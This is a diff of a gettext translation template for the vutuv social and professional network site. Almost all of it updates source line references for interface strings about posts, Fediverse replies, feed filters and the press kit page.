 #: lib/vutuv_web/components/post_components.ex:1734
-#: lib/vutuv_web/components/post_components.ex:3607
-#: lib/vutuv_web/components/post_components.ex:3935
+#: lib/vutuv_web/components/post_components.ex:3611
+#: lib/vutuv_web/components/post_components.ex:3938
 #: lib/vutuv_web/templates/remote_actor_card/card.html.heex:366
 #, elixir-autogen, elixir-format
 msgid "View the original"
@@ -15795,7 +15795,7 @@ msgstr ""
 #: lib/vutuv_web/live/admin/activity_live.ex:237
 #: lib/vutuv_web/live/admin/media_live.ex:155
 #: lib/vutuv_web/live/fediverse_following_live.ex:351
-#: lib/vutuv_web/live/tag_live/timeline.ex:478
+#: lib/vutuv_web/live/tag_live/timeline.ex:479
 #, elixir-autogen, elixir-format
 msgid "Nothing matches that. Try a shorter search, or clear the filters."
 msgstr ""
@@ -16015,22 +16015,22 @@ msgstr ""
 msgid "device or detail"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4551
+#: lib/vutuv_web/components/post_components.ex:4554
 #, elixir-autogen, elixir-format
 msgid "Pinned post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4685
+#: lib/vutuv_web/components/post_components.ex:4688
 #, elixir-autogen, elixir-format
 msgid "Pin to profile"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4693
+#: lib/vutuv_web/components/post_components.ex:4696
 #, elixir-autogen, elixir-format
 msgid "Unpin from profile"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4679
+#: lib/vutuv_web/components/post_components.ex:4682
 #, elixir-autogen, elixir-format
 msgid "Only one post can be pinned to your profile. Pin this one and release the other?"
 msgstr ""
@@ -16153,19 +16153,19 @@ msgstr ""
 msgid "No image description yet"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4130
+#: lib/vutuv_web/components/post_components.ex:4133
 #, elixir-autogen, elixir-format
 msgid "Open Fediverse settings"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5634
-#: lib/vutuv_web/components/press_kit_components.ex:526
+#: lib/vutuv_web/components/post_components.ex:5637
+#: lib/vutuv_web/components/press_kit_components.ex:562
 #, elixir-autogen, elixir-format
 msgid "Photo %{n} of %{total}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5862
-#: lib/vutuv_web/components/press_kit_components.ex:623
+#: lib/vutuv_web/components/post_components.ex:5865
+#: lib/vutuv_web/components/press_kit_components.ex:660
 #, elixir-autogen, elixir-format
 msgid "Photo is being checked"
 msgstr ""
@@ -16178,7 +16178,7 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1500
 #: lib/vutuv_web/agent_docs/text.ex:909
-#: lib/vutuv_web/components/post_components.ex:5944
+#: lib/vutuv_web/components/post_components.ex:5947
 #, elixir-autogen, elixir-format
 msgid "Photos:"
 msgstr ""
@@ -16204,7 +16204,7 @@ msgstr ""
 msgid "Show camera settings"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4183
+#: lib/vutuv_web/components/post_components.ex:4186
 #, elixir-autogen, elixir-format
 msgid "That server is blocked on this site, so no answer can be sent to it."
 msgstr ""
@@ -16224,7 +16224,7 @@ msgstr ""
 msgid "This photo carries the location it was taken at. Anyone who downloads the exact file can read it."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4174
+#: lib/vutuv_web/components/post_components.ex:4177
 #, elixir-autogen, elixir-format
 msgid "This reply was sent to you alone, so it cannot be answered publicly."
 msgstr ""
@@ -16234,12 +16234,12 @@ msgstr ""
 msgid "This reply was written on another network. Answering it means sending your words to that network, which vutuv only does for members who have switched Fediverse participation on."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4192
+#: lib/vutuv_web/components/post_components.ex:4195
 #, elixir-autogen, elixir-format
 msgid "This site does not take part in the Fediverse."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4126
+#: lib/vutuv_web/components/post_components.ex:4129
 #, elixir-autogen, elixir-format
 msgid "Turn on Fediverse participation to answer"
 msgstr ""
@@ -16254,7 +16254,7 @@ msgstr ""
 msgid "You have sent a lot of answers to other networks in the past hour. Please try again later."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4187
+#: lib/vutuv_web/components/post_components.ex:4190
 #, elixir-autogen, elixir-format
 msgid "You moved your Fediverse account to another server, so answers are no longer sent from here."
 msgstr ""
@@ -16264,7 +16264,7 @@ msgstr ""
 msgid "Your Fediverse settings do not allow sending an answer right now."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4140
+#: lib/vutuv_web/components/post_components.ex:4143
 #, elixir-autogen, elixir-format
 msgid "Your answer goes to %{handle} on their own server and to your Fediverse followers. It is a public post on vutuv as well."
 msgstr ""
@@ -16339,13 +16339,13 @@ msgstr[0] ""
 msgstr[1] ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1357
-#: lib/vutuv_web/components/post_components.ex:7255
+#: lib/vutuv_web/components/post_components.ex:7231
 #, elixir-autogen, elixir-format
 msgid "%{handle} liked this"
 msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:1355
-#: lib/vutuv_web/components/post_components.ex:7252
+#: lib/vutuv_web/components/post_components.ex:7228
 #, elixir-autogen, elixir-format
 msgid "%{handle} shared this"
 msgstr ""
@@ -16355,7 +16355,7 @@ msgstr ""
 msgid "Fediverse reactions"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7139
+#: lib/vutuv_web/components/post_components.ex:7134
 #, elixir-autogen, elixir-format
 msgid "From other networks"
 msgstr ""
@@ -16707,7 +16707,7 @@ msgstr ""
 msgid "Thank you. Our copy was deleted right away."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3934
+#: lib/vutuv_web/components/post_components.ex:3937
 #, elixir-autogen, elixir-format
 msgid "Vote on the original"
 msgstr ""
@@ -16732,7 +16732,7 @@ msgstr ""
 msgid "Hide"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:3875
+#: lib/vutuv_web/components/post_components.ex:3878
 #, elixir-autogen, elixir-format
 msgid "Marked as sensitive by its author"
 msgstr ""
@@ -16862,12 +16862,12 @@ msgstr ""
 msgid "Sensitive. Show the picture."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4033
+#: lib/vutuv_web/components/post_components.ex:4036
 #, elixir-autogen, elixir-format
 msgid "That is a lot of likes in one hour. Please try again later."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4039
+#: lib/vutuv_web/components/post_components.ex:4042
 #, elixir-autogen, elixir-format
 msgid "That post is not here any more."
 msgstr ""
@@ -16877,7 +16877,7 @@ msgstr ""
 msgid "Back to the feed"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4178
+#: lib/vutuv_web/components/post_components.ex:4181
 #, elixir-autogen, elixir-format
 msgid "This post was published to that account's followers only, so it cannot be answered with a public post here."
 msgstr ""
@@ -17505,7 +17505,7 @@ msgstr ""
 msgid "View the conversation"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:286
+#: lib/vutuv_web/live/tag_live/timeline.ex:287
 #: lib/vutuv_web/templates/post/index.html.heex:18
 #, elixir-autogen, elixir-format
 msgid "%{formatted} post"
@@ -17513,32 +17513,32 @@ msgid_plural "%{formatted} posts"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:455
+#: lib/vutuv_web/live/tag_live/timeline.ex:456
 #, elixir-autogen, elixir-format
 msgid "Most liked"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:486
+#: lib/vutuv_web/live/tag_live/timeline.ex:487
 #, elixir-autogen, elixir-format
 msgid "No posts carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:484
+#: lib/vutuv_web/live/tag_live/timeline.ex:485
 #, elixir-autogen, elixir-format
 msgid "No posts from other networks carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:481
+#: lib/vutuv_web/live/tag_live/timeline.ex:482
 #, elixir-autogen, elixir-format
 msgid "No posts on vutuv carry this tag yet."
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:362
+#: lib/vutuv_web/live/tag_live/timeline.ex:363
 #, elixir-autogen, elixir-format
 msgid "word in a post"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4036
+#: lib/vutuv_web/components/post_components.ex:4039
 #, elixir-autogen, elixir-format
 msgid "That reply is not here any more."
 msgstr ""
@@ -17610,19 +17610,19 @@ msgstr ""
 msgid "Liked by"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6238
+#: lib/vutuv_web/components/post_components.ex:6241
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6240
+#: lib/vutuv_web/components/post_components.ex:6243
 #, elixir-autogen, elixir-format
 msgid "Liked by %{name} and %{formatted} other"
 msgid_plural "Liked by %{name} and %{formatted} others"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:6251
+#: lib/vutuv_web/components/post_components.ex:6254
 #, elixir-autogen, elixir-format
 msgid "Only you see everyone here: some of these members are not named to other readers."
 msgstr ""
@@ -17794,7 +17794,7 @@ msgstr ""
 msgid "Label"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3958
+#: lib/vutuv_web/live/post_live/feed.ex:3956
 #: lib/vutuv_web/live/reference_check_live.ex:169
 #, elixir-autogen, elixir-format
 msgid "Loading…"
@@ -19205,7 +19205,7 @@ msgstr ""
 msgid "Start over"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:4066
+#: lib/vutuv_web/components/post_components.ex:4069
 #, elixir-autogen, elixir-format
 msgid "A like or a repost is sent back to the network this post came from, and your account does not take part in the Fediverse at the moment. You can switch it on in the {settings}."
 msgstr ""
@@ -20073,27 +20073,27 @@ msgstr ""
 msgid "The language this post is written in"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6132
+#: lib/vutuv_web/components/post_components.ex:6135
 #, elixir-autogen, elixir-format
 msgid "Show the original"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6168
+#: lib/vutuv_web/components/post_components.ex:6171
 #, elixir-autogen, elixir-format
 msgid "Translate"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6177
+#: lib/vutuv_web/components/post_components.ex:6180
 #, elixir-autogen, elixir-format
 msgid "Translated"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6180
+#: lib/vutuv_web/components/post_components.ex:6183
 #, elixir-autogen, elixir-format
 msgid "Translated from %{language}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6157
+#: lib/vutuv_web/components/post_components.ex:6160
 #, elixir-autogen, elixir-format
 msgid "Translating…"
 msgstr ""
@@ -20103,7 +20103,7 @@ msgstr ""
 msgid "Feed language settings reset to the site defaults."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6147
+#: lib/vutuv_web/components/post_components.ex:6150
 #: lib/vutuv_web/components/ui.ex:5549
 #: lib/vutuv_web/live/feed_languages_live.ex:65
 #: lib/vutuv_web/live/feed_languages_live.ex:200
@@ -20232,20 +20232,20 @@ msgstr ""
 msgid "Your username, or paste the address of your profile page."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5910
+#: lib/vutuv_web/components/post_components.ex:5913
 #, elixir-autogen, elixir-format
 msgid "Our AI is still checking it. As soon as it is through, the photo appears by itself."
 msgid_plural "Our AI is still checking them, %{done} of %{total} done. As soon as the last one is through, the photos appear by themselves."
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:5907
+#: lib/vutuv_web/components/post_components.ex:5910
 #, elixir-autogen, elixir-format
 msgid "Your post is published, the photo is not there yet."
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:2913
-#: lib/vutuv_web/components/post_components.ex:4976
+#: lib/vutuv_web/components/post_components.ex:4979
 #, elixir-autogen, elixir-format
 msgid "Our AI is looking at it. It appears here by itself once it is through."
 msgid_plural "Our AI is looking at them. They appear here by themselves once they are through."
@@ -20838,7 +20838,7 @@ msgstr ""
 msgid "email mail unsubscribe newsletter bell alert quiet fewer browser desktop popup push benachrichtigung"
 msgstr ""
 
-#: lib/vutuv_web/live/tag_live/timeline.ex:341
+#: lib/vutuv_web/live/tag_live/timeline.ex:342
 #, elixir-autogen, elixir-format
 msgid "%{formatted} active"
 msgstr ""
@@ -20883,7 +20883,7 @@ msgstr ""
 msgid "Follow #%{tag} from Mastodon or any other Fediverse app and its public posts arrive in your timeline. No vutuv account needed."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4128
+#: lib/vutuv_web/live/post_live/feed.ex:4126
 #, elixir-autogen, elixir-format
 msgid "Greet other members"
 msgstr ""
@@ -21356,13 +21356,13 @@ msgid "Hide a word or a whole phrase …"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/feed.ex:854
-#: lib/vutuv_web/live/post_live/feed.ex:4291
+#: lib/vutuv_web/live/post_live/feed.ex:4289
 #, elixir-autogen, elixir-format
 msgid "Hide tags"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/feed.ex:853
-#: lib/vutuv_web/live/post_live/feed.ex:4280
+#: lib/vutuv_web/live/post_live/feed.ex:4278
 #, elixir-autogen, elixir-format
 msgid "Hide words"
 msgstr ""
@@ -21429,7 +21429,7 @@ msgstr ""
 msgid "Posts containing one of these are folded to a single line — not deleted, and with a way to open them anyway."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4154
+#: lib/vutuv_web/live/post_live/feed.ex:4152
 #, elixir-autogen, elixir-format
 msgid "Put away:"
 msgstr ""
@@ -21468,7 +21468,7 @@ msgid "Show posts by %{name}"
 msgstr ""
 
 #: lib/vutuv_web/live/post_live/feed.ex:852
-#: lib/vutuv_web/live/post_live/feed.ex:4246
+#: lib/vutuv_web/live/post_live/feed.ex:4244
 #, elixir-autogen, elixir-format
 msgid "Sources"
 msgstr ""
@@ -21507,8 +21507,8 @@ msgid_plural "and %{formatted} more"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3711
-#: lib/vutuv_web/live/post_live/feed.ex:3738
+#: lib/vutuv_web/live/post_live/feed.ex:3709
+#: lib/vutuv_web/live/post_live/feed.ex:3736
 #, elixir-autogen, elixir-format
 msgctxt "feed filter sheet"
 msgid "Filter"
@@ -21538,7 +21538,7 @@ msgid "Your organization page was updated. The new logo is being checked and app
 msgstr ""
 
 #: lib/vutuv_web/live/organization_live/edit.ex:290
-#: lib/vutuv_web/live/press_kit_live.ex:1225
+#: lib/vutuv_web/live/press_kit_live.ex:1250
 #: lib/vutuv_web/templates/user/edit.html.heex:22
 #, elixir-autogen, elixir-format
 msgid "%{formats}, up to %{limit}"
@@ -21570,7 +21570,7 @@ msgid_plural "%{count} posts on %{day}"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3915
+#: lib/vutuv_web/live/post_live/feed.ex:3913
 #, elixir-autogen, elixir-format
 msgid "Back to now"
 msgstr ""
@@ -21580,7 +21580,7 @@ msgstr ""
 msgid "Busy month: the shading counts at least this much."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3961
+#: lib/vutuv_web/live/post_live/feed.ex:3959
 #, elixir-autogen, elixir-format
 msgid "Load the whole day (%{formatted} post)"
 msgid_plural "Load the whole day (%{formatted} posts)"
@@ -21602,7 +21602,7 @@ msgstr ""
 msgid "Next year"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3911
+#: lib/vutuv_web/live/post_live/feed.ex:3909
 #, elixir-autogen, elixir-format
 msgid "Nothing reached your feed on %{day}."
 msgstr ""
@@ -21696,7 +21696,7 @@ msgid_plural "New (%{formatted}):"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/components/post_components.ex:3802
+#: lib/vutuv_web/components/post_components.ex:3805
 #, elixir-autogen, elixir-format
 msgid "Quoted post"
 msgstr ""
@@ -21752,7 +21752,7 @@ msgstr ""
 msgid "only %{account}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7600
+#: lib/vutuv_web/components/post_components.ex:7576
 #: lib/vutuv_web/live/post_live/filter_band.ex:290
 #: lib/vutuv_web/live/post_live/filter_band.ex:379
 #, elixir-autogen, elixir-format
@@ -21936,7 +21936,7 @@ msgctxt "phone tab bar"
 msgid "Write"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4049
+#: lib/vutuv_web/live/post_live/feed.ex:4047
 #: lib/vutuv_web/live/post_rewrites_live.ex:287
 #, elixir-autogen, elixir-format
 msgid "%{formatted} rule"
@@ -22006,7 +22006,7 @@ msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:1457
 #: lib/vutuv_web/components/post_components.ex:3407
-#: lib/vutuv_web/components/post_components.ex:4766
+#: lib/vutuv_web/components/post_components.ex:4769
 #: lib/vutuv_web/components/ui.ex:5541
 #: lib/vutuv_web/live/post_rewrites_live.ex:76
 #: lib/vutuv_web/live/post_rewrites_live.ex:262
@@ -22237,7 +22237,7 @@ msgstr[1] ""
 msgid "Last 30 days: %{parts}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5328
+#: lib/vutuv_web/components/post_components.ex:5331
 #: lib/vutuv_web/live/notification_live/index.ex:1003
 #, elixir-autogen, elixir-format
 msgid "Less"
@@ -22552,7 +22552,7 @@ msgid "Hidden. What they pass on stays out of your feed; their own posts do not.
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3379
-#: lib/vutuv_web/components/post_components.ex:4760
+#: lib/vutuv_web/components/post_components.ex:4763
 #, elixir-autogen, elixir-format
 msgid "Hide reposts"
 msgstr ""
@@ -22733,8 +22733,8 @@ msgstr ""
 msgid "Posts loaded at once"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:3985
-#: lib/vutuv_web/live/post_live/feed.ex:3989
+#: lib/vutuv_web/live/post_live/feed.ex:3983
+#: lib/vutuv_web/live/post_live/feed.ex:3987
 #, elixir-autogen, elixir-format
 msgid "Posts per page"
 msgstr ""
@@ -22749,60 +22749,60 @@ msgstr ""
 msgid "feed length page size posts number amount load more scroll paging seite länge anzahl beiträge nachladen mehr laden umfang"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7591
-#: lib/vutuv_web/components/post_components.ex:7592
+#: lib/vutuv_web/components/post_components.ex:7567
+#: lib/vutuv_web/components/post_components.ex:7568
 #, elixir-autogen, elixir-format
 msgid "A word or phrase …"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7619
+#: lib/vutuv_web/components/post_components.ex:7595
 #, elixir-autogen, elixir-format
 msgid "For whom %{thing} is hidden"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4046
-#: lib/vutuv_web/live/post_live/feed.ex:4210
-#: lib/vutuv_web/live/post_live/feed.ex:4219
+#: lib/vutuv_web/live/post_live/feed.ex:4044
+#: lib/vutuv_web/live/post_live/feed.ex:4208
+#: lib/vutuv_web/live/post_live/feed.ex:4217
 #, elixir-autogen, elixir-format
 msgid "Hidden"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4184
+#: lib/vutuv_web/live/post_live/feed.ex:4182
 #, elixir-autogen, elixir-format
 msgid "Hide something from your feed"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7537
+#: lib/vutuv_web/components/post_components.ex:7513
 #, elixir-autogen, elixir-format
 msgid "Stop showing"
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4225
+#: lib/vutuv_web/live/post_live/feed.ex:4223
 #, elixir-autogen, elixir-format
 msgid "Whatever these match is folded to a single line in your feed."
 msgstr ""
 
-#: lib/vutuv_web/live/post_live/feed.ex:4245
+#: lib/vutuv_web/live/post_live/feed.ex:4243
 #, elixir-autogen, elixir-format
 msgid "Words & tags"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7623
+#: lib/vutuv_web/components/post_components.ex:7599
 #, elixir-autogen, elixir-format
 msgid "everyone"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7626
+#: lib/vutuv_web/components/post_components.ex:7602
 #, elixir-autogen, elixir-format
 msgid "only %{handle}"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7595
+#: lib/vutuv_web/components/post_components.ex:7571
 #, elixir-autogen, elixir-format
 msgid "this word"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:7636
+#: lib/vutuv_web/components/post_components.ex:7612
 #, elixir-autogen, elixir-format
 msgid "only %{server}"
 msgstr ""
@@ -22854,7 +22854,7 @@ msgstr ""
 msgid "The site itself is running, this address just is not one of ours. The link is probably old, or it carries a typo."
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:6941
+#: lib/vutuv_web/components/post_components.ex:6944
 #, elixir-autogen, elixir-format
 msgid "Show this screenshot larger"
 msgstr ""
@@ -22945,7 +22945,7 @@ msgid "Hidden. What other people pass on of them stays out of your feed; their o
 msgstr ""
 
 #: lib/vutuv_web/components/post_components.ex:3365
-#: lib/vutuv_web/components/post_components.ex:4748
+#: lib/vutuv_web/components/post_components.ex:4751
 #, elixir-autogen, elixir-format
 msgid "Hide when others repost them"
 msgstr ""
@@ -23660,13 +23660,13 @@ msgstr ""
 msgid "“%{note}”"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5506
+#: lib/vutuv_web/components/post_components.ex:5509
 #: lib/vutuv_web/components/press_kit_components.ex:216
 #, elixir-autogen, elixir-format
 msgid "Show these photos larger"
 msgstr ""
 
-#: lib/vutuv_web/components/post_components.ex:5692
+#: lib/vutuv_web/components/post_components.ex:5695
 #, elixir-autogen, elixir-format
 msgid "Show this photo larger"
 msgstr ""
@@ -23685,48 +23685,48 @@ msgid_plural "%{formatted} more entries (%{years})"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1299
+#: lib/vutuv_web/live/press_kit_live.ex:1324
 #, elixir-autogen, elixir-format
 msgid "%{percent}%"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:847
+#: lib/vutuv_web/live/press_kit_live.ex:872
 #, elixir-autogen, elixir-format
 msgid "%{used} of %{max}"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1133
+#: lib/vutuv_web/live/press_kit_live.ex:1158
 #, elixir-autogen, elixir-format
 msgid "A photographer's @handle links to their profile and notifies nobody."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1218
+#: lib/vutuv_web/live/press_kit_live.ex:1243
 #, elixir-autogen, elixir-format
 msgid "Add a logo variant"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1219
+#: lib/vutuv_web/live/press_kit_live.ex:1244
 #, elixir-autogen, elixir-format
 msgid "Add a press photo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1095
+#: lib/vutuv_web/live/press_kit_live.ex:1120
 #, elixir-autogen, elixir-format
 msgid "At the desk in the Bonn office"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1127
+#: lib/vutuv_web/live/press_kit_live.ex:1152
 #, elixir-autogen, elixir-format
 msgid "Caption"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1105
-#: lib/vutuv_web/live/press_kit_live.ex:1170
+#: lib/vutuv_web/live/press_kit_live.ex:1130
+#: lib/vutuv_web/live/press_kit_live.ex:1195
 #, elixir-autogen, elixir-format
 msgid "Credit"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Dark"
 msgstr ""
@@ -23736,22 +23736,22 @@ msgstr ""
 msgid "Files a journalist may download and print"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1016
+#: lib/vutuv_web/live/press_kit_live.ex:1041
 #, elixir-autogen, elixir-format
 msgid "First: the main photo"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1015
+#: lib/vutuv_web/live/press_kit_live.ex:1040
 #, elixir-autogen, elixir-format
 msgid "First: the main variant"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1193
+#: lib/vutuv_web/live/press_kit_live.ex:1218
 #, elixir-autogen, elixir-format
 msgid "I hold the rights to this file and release it for editorial use, as long as the credit above is shown."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:864
+#: lib/vutuv_web/live/press_kit_live.ex:889
 #, elixir-autogen, elixir-format
 msgid "Light"
 msgstr ""
@@ -23763,13 +23763,13 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:123
 #: lib/vutuv_web/agent_docs/text.ex:414
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:55
 #, elixir-autogen, elixir-format
 msgid "Logo variants"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:878
+#: lib/vutuv_web/live/press_kit_live.ex:903
 #, elixir-autogen, elixir-format
 msgid "No logo here yet."
 msgstr ""
@@ -23784,13 +23784,13 @@ msgstr ""
 msgid "No more than %{max} press photos."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:879
+#: lib/vutuv_web/live/press_kit_live.ex:904
 #, elixir-autogen, elixir-format
 msgid "No press photo here yet."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1114
-#: lib/vutuv_web/live/press_kit_live.ex:1180
+#: lib/vutuv_web/live/press_kit_live.ex:1139
+#: lib/vutuv_web/live/press_kit_live.ex:1205
 #, elixir-autogen, elixir-format
 msgid "Photo: Ada King"
 msgstr ""
@@ -23800,7 +23800,7 @@ msgstr ""
 msgid "Picture removed."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:537
+#: lib/vutuv_web/live/press_kit_live.ex:562
 #, elixir-autogen, elixir-format
 msgid "Please confirm the rights first, then choose the file."
 msgstr ""
@@ -23812,63 +23812,63 @@ msgstr ""
 
 #: lib/vutuv_web/agent_docs/markdown.ex:122
 #: lib/vutuv_web/agent_docs/text.ex:413
-#: lib/vutuv_web/live/press_kit_live.ex:838
+#: lib/vutuv_web/live/press_kit_live.ex:863
 #: lib/vutuv_web/templates/press_kit/index.html.heex:46
 #, elixir-autogen, elixir-format
 msgid "Press photos"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:862
+#: lib/vutuv_web/live/press_kit_live.ex:887
 #, elixir-autogen, elixir-format
 msgid "Show tiles on:"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1117
+#: lib/vutuv_web/live/press_kit_live.ex:1142
 #, elixir-autogen, elixir-format
 msgid "Shown beside the picture and asked for with every download."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:550
+#: lib/vutuv_web/live/press_kit_live.ex:575
 #, elixir-autogen, elixir-format
 msgid "That could not be saved."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1338
+#: lib/vutuv_web/live/press_kit_live.ex:1363
 #, elixir-autogen, elixir-format
 msgid "The first photo is the one shown first. Drag a tile, or use the arrows, to change the order."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:947
+#: lib/vutuv_web/live/press_kit_live.ex:972
 #, elixir-autogen, elixir-format
 msgid "This shelf is full. Remove one picture to add another."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:797
+#: lib/vutuv_web/live/press_kit_live.ex:822
 #, elixir-autogen, elixir-format
 msgid "What a journalist writing about you may download: photos in print quality and your logo as a file. Everything here is public and free for editorial use as long as your credit is shown."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1083
+#: lib/vutuv_web/live/press_kit_live.ex:1108
 #, elixir-autogen, elixir-format
 msgid "What the picture shows"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1082
+#: lib/vutuv_web/live/press_kit_live.ex:1107
 #, elixir-autogen, elixir-format
 msgid "Which variant this is"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1094
+#: lib/vutuv_web/live/press_kit_live.ex:1119
 #, elixir-autogen, elixir-format
 msgid "White on a dark background"
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1128
+#: lib/vutuv_web/live/press_kit_live.ex:1153
 #, elixir-autogen, elixir-format
 msgid "Who took it, where, and what may be cropped."
 msgstr ""
 
-#: lib/vutuv_web/live/press_kit_live.ex:1330
+#: lib/vutuv_web/live/press_kit_live.ex:1355
 #, elixir-autogen, elixir-format
 msgid "Your logo as a file, one tile per variant. A vector (SVG) is what a printer asks for; a PNG is what everybody else can open."
 msgstr ""
@@ -23885,14 +23885,14 @@ msgid_plural "%{count} bytes"
 msgstr[0] ""
 msgstr[1] ""
 
-#: lib/vutuv_web/agent_docs/markdown.ex:1560
-#: lib/vutuv_web/agent_docs/text.ex:993
+#: lib/vutuv_web/agent_docs/markdown.ex:1564
+#: lib/vutuv_web/agent_docs/text.ex:995
 #, elixir-autogen, elixir-format
 msgid "Credit: %{credit}"
 msgstr ""
 
-#: lib/vutuv_web/components/press_kit_components.ex:380
-#: lib/vutuv_web/components/press_kit_components.ex:383
+#: lib/vutuv_web/components/press_kit_components.ex:386
